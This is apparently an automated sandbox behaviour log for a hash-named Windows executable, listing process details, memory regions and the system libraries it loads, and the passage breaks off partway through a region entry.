# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 27.09.2021 16:30:17.108 Process: id = "1" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x4b07e000" os_pid = "0x5bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x640" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 126 start_va = 0x400000 end_va = 0x598fff monitored = 1 entry_point = 0x466824 region_type = mapped_file name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") Region: id = 127 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 131 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 132 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 270 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 271 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 273 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x600000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 276 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 280 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 281 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 282 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 283 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 284 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 285 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 286 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 287 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 288 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 289 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 290 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 291 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 292 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 293 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 294 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 295 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 296 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 297 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 298 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 299 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 300 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 301 start_va = 0x5a0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 302 start_va = 0x8c0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 303 start_va = 0x6cb60000 end_va = 0x6cbf1fff monitored = 0 entry_point = 0x6cb6dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 304 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 305 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 306 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 307 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 308 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 309 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 310 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 311 start_va = 0x9c0000 end_va = 0xb47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 312 start_va = 0xb50000 end_va = 0xb79fff monitored = 0 entry_point = 0xb55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 313 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 314 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 315 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 316 start_va = 0xb50000 end_va = 0xcd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 317 start_va = 0xce0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 318 start_va = 0x20e0000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 319 start_va = 0x20e0000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 320 start_va = 0x2270000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 321 start_va = 0x2280000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 322 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 323 start_va = 0x2380000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 324 start_va = 0x20e0000 end_va = 0x20e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 325 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 326 start_va = 0x2180000 end_va = 0x223bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 327 start_va = 0x20e0000 end_va = 0x20e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 328 start_va = 0x20f0000 end_va = 0x20f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 329 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 330 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 331 start_va = 0x701d0000 end_va = 0x701ecfff monitored = 0 entry_point = 0x701d3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 332 start_va = 0x2110000 end_va = 0x2111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002110000" filename = "" Region: id = 333 start_va = 0x2120000 end_va = 0x2120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 334 start_va = 0x2130000 end_va = 0x2134fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 335 start_va = 0x2140000 end_va = 0x2141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 336 start_va = 0x6f000000 end_va = 0x6f20efff monitored = 0 entry_point = 0x6f0ab0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 337 start_va = 0x2150000 end_va = 0x2150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 338 start_va = 0x2160000 end_va = 0x2161fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 339 start_va = 0x2150000 end_va = 0x2150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 340 start_va = 0x2240000 end_va = 0x2240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 341 start_va = 0x24f0000 end_va = 0x2826fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 342 start_va = 0x2380000 end_va = 0x249afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 343 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 344 start_va = 0x2830000 end_va = 0x294afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 345 start_va = 0x24a0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 346 start_va = 0x2950000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 347 start_va = 0x725b0000 end_va = 0x726fafff monitored = 0 entry_point = 0x72611660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 348 start_va = 0x2a50000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 349 start_va = 0x2a90000 end_va = 0x2b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 350 start_va = 0x2250000 end_va = 0x2250fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002250000" filename = "" Region: id = 351 start_va = 0x2b90000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 352 start_va = 0x2bd0000 end_va = 0x2ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 353 start_va = 0x2cd0000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 354 start_va = 0x2d10000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 355 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 356 start_va = 0x73f00000 end_va = 0x7411bfff monitored = 0 entry_point = 0x740cbc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 357 start_va = 0x2260000 end_va = 0x2260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002260000" filename = "" Region: id = 358 start_va = 0x2e10000 end_va = 0x2ee2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 359 start_va = 0x75670000 end_va = 0x75675fff monitored = 0 entry_point = 0x75671460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 360 start_va = 0x70830000 end_va = 0x70a3cfff monitored = 0 entry_point = 0x7091acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 361 start_va = 0x6c380000 end_va = 0x6c4eafff monitored = 0 entry_point = 0x6c3ee360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 362 start_va = 0x2950000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 363 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 364 start_va = 0x749d0000 end_va = 0x74b47fff monitored = 0 entry_point = 0x74a28a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 365 start_va = 0x74640000 end_va = 0x7464dfff monitored = 0 entry_point = 0x74645410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 366 start_va = 0x72180000 end_va = 0x7244afff monitored = 0 entry_point = 0x723bc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 367 start_va = 0x24a0000 end_va = 0x24a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 368 start_va = 0x24b0000 end_va = 0x24b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 369 start_va = 0x2950000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 370 start_va = 0x29a0000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 371 start_va = 0x2ef0000 end_va = 0x2feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 372 start_va = 0x24c0000 end_va = 0x24c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 373 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 374 start_va = 0x24d0000 end_va = 0x24dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 375 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 376 start_va = 0x2990000 end_va = 0x2994fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 377 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 378 start_va = 0x2990000 end_va = 0x2991fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 379 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 380 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 586 start_va = 0x24c0000 end_va = 0x24c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 587 start_va = 0x29b0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 588 start_va = 0x2ff0000 end_va = 0x30effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 589 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 590 start_va = 0x24d0000 end_va = 0x24dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 591 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 592 start_va = 0x2990000 end_va = 0x2994fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 593 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 594 start_va = 0x2990000 end_va = 0x2991fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 595 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 596 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 958 start_va = 0x29f0000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 959 start_va = 0x30f0000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 1165 start_va = 0x24c0000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024c0000" filename = "" Region: id = 1166 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1167 start_va = 0x70800000 end_va = 0x70811fff monitored = 0 entry_point = 0x70804510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1168 start_va = 0x72040000 end_va = 0x7206efff monitored = 0 entry_point = 0x7204bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1169 start_va = 0x70760000 end_va = 0x707fafff 